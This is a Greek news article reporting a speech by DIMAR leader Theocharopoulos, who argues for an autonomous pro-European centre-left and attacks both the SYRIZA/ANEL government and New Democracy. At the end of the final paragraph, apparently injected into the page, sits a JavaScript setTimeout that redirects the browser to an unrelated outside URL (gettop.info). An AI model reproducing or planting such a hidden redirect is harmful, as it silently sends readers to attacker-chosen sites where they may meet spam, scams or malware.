Θεοχαρόπουλος: Οι ΣΥΡΙΖΑΝΕΛ έχουν καταστρατηγήσει καθετί αριστερό για να μείνουν στην εξουσία

0
8

 

Στην Κεντρική Επιτροπή της ΔΗΜΑΡ μίλησε ο επικεφαλής της παράταξης τονίζοντας πως «ισχυρή αυτόνομη Κεντροαριστερά, χωρίς αυταπάτες και λαϊκισμό, αλλά με σταθερό ευρωπαϊκό προσανατολισμό, σημαίνει ξεκάθαρη πολιτική και ιδεολογική οριοθέτηση, τόσο από τον ΣΥΡΙΖΑ όσο και από τη ΝΔ«.

Όπως υπογράμμισε, η χώρα χρειάζεται έναν ισχυρό ενιαίο προοδευτικό φορέα της σοσιαλδημοκρατίας, της ανανεωτικής αριστεράς και του προοδευτικού κέντρου και η ΔΗΜΑΡ είναι διατεθειμένη και αποφασισμένη να ανταποκριθεί στη δημιουργία μια μεγάλης παράταξης με τις δικές της θέσεις και προτάσεις.

«Απαιτείται ένα σαφές άνοιγμα σε δυνάμεις, κινήσεις και ανένταχτες προσωπικότητες του ευρύτερου προοδευτικού κέντρου» επεσήμανε και συμπλήρωσε ότι στόχος είναι μία σύγχρονη σοσιαλδημοκρατία, όπως εφαρμόσθηκε πετυχημένα σε χώρες της ΕΕ, οδηγώντας σε ένα υψηλό βιοτικό επίπεδο, με κοινωνική συνοχή και δικαιοσύνη και σύγχρονες υπηρεσίες κοινωνικής πολιτικής και όχι τον κρατισμό με επιδοματικές πολιτικές αναπαραγωγής της φτώχειας.

Μίλησε για αποτυχία της συνεννόησης και συνεργασίας με το Ποτάμι, ωστόσο, επέμενε ότι η συμπόρευση των δυνάμεων στον ευρύτερο χώρο της Κεντροαριστεράς είναι αναγκαία,όσο ποτέ, για τον τόπο και τώρα είναι η καταλληλη συγκυρία.

Ο κ. Θεοχαρόπουλος εξαπέλυσε επίθεση εναντίον της κυβέρνησης ΣΥΡΙΖΑ/ΑΝΕΛ, δηλώνοντας ότι έχει καταστρατηγήσει καθετί αριστερό και προοδευτικό για να μείνει στην εξουσία. «Η χώρα μας δεν κινδυνεύει από τον Στάλιν. Κινδυνεύει, όμως, από ένα κόμμα που πιστεύει ότι πρέπει να καταργήσει τη διάκριση των εξουσιών. Ο δικός μας χώρος έχει έρθει σε σύγκρουση με ένα αξίωμα που έλεγε ότι για να κυβερνήσει καλά η Αριστερά δεν πρέπει να έρθει μόνο στην κυβέρνηση, αλλά θα πρέπει και να «καταλάβει» και τους θεσμούς. Εμείς στη Δημοκρατική Αριστερά, τονίζω με έμφαση το Δημοκρατική, δεν συμφωνούμε με τέτοιες πολιτικές που είναι στον αντίποδα του DNA μας. Θα μπορούσαμε, άραγε, να συναινέσουμε και να χαρακτηρίσουμε ως προοδευτική, μια πολιτική παρεμβάσεων στα ΜΜΕ, στους δήμους; Όχι βεβαίως, εμείς δεν θα μπορούσαμε και δεν το κάνουμε για κανένα αντάλλαγμα».

Όσον αφορά στη ΝΔ είε ότι αυτή δεν είναι η λύση για τη χώρα: «Η λύση σήμερα, δεν είναι η συντηρητική παλινόρθωση, στην οποία στοχεύει η ΝΔ. Εμείς, δεν έχουμε αυταπάτες. Δεν αντέχει η χώρα άλλο γύρο ψευδαισθήσεων.Η αλλαγή ηγεσίας στη ΝΔ, δεν συνιστά επί της ουσίας αλλαγή στο διαχρονικά συντηρητικό ιδεολογικό, πολιτικό και προγραμματικό πρόσημό της». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here